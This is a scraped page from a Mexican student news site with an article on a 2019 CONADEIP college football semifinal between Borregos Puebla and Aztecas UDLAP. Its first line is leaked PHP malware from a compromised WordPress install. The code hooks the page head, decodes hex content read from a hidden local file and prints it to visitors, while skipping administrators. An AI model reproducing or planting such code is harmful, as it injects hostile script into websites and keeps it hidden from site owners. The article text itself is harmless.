if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Borregos Puebla y Aztecas UDLAP se verán las caras en playoffs – La Opinión Universitaria La Opinión Universitaria
Menu

Borregos Puebla y Aztecas UDLAP se verán las caras en playoffs

 

*Se enfrentaran en el partido de semifinales programado para el próximo sábado 16 de noviembre

 

Llegó a su fin la temporada regular 2019 del Campeonato Nacional de la Conferencia Premier de la Comisión Nacional Deportiva Estudiantil de

Instituciones Privadas (CONADEIP), quedando definidos los partidos de las Semifinales, donde destaca el enfrentamiento entre los Borregos Puebla y los Aztecas de UDLAP, programado para el próximo sábado 16 de noviembre a las 13:00 horas en el ‘Templo del Dolor’.

En la última semana de la temporada regular, los Aztecas perdieron 28-22 ante Borregos Monterrey, dando paso así a la combinación donde el perdedor de este juego dejó escapar el primer lugar y se condenó a enfrentar en semifinales al caballo negro de la liga: Borregos Puebla.

El antecedente de campaña regular, marca un agónico triunfo de la UDLAP 26-24 en el marco de la semana 3 y una contundente demostración en la semana 6 del Tec Puebla en el juego celebrado en la Universidad de las Américas, que concluyó con marcador de 31-24 a favor de los de la Atlixcáyotl.

Es así como se espera la fecha marcada y el juego que podría darle a Borregos Puebla su primera final dentro de la Conferencia Premier de Futbol Americano de la CONADEIP; o por el contrario, marcar otro juego por el título para los Aztecas.

 

  • No comments

    Deja una respuesta

    Tweets recientes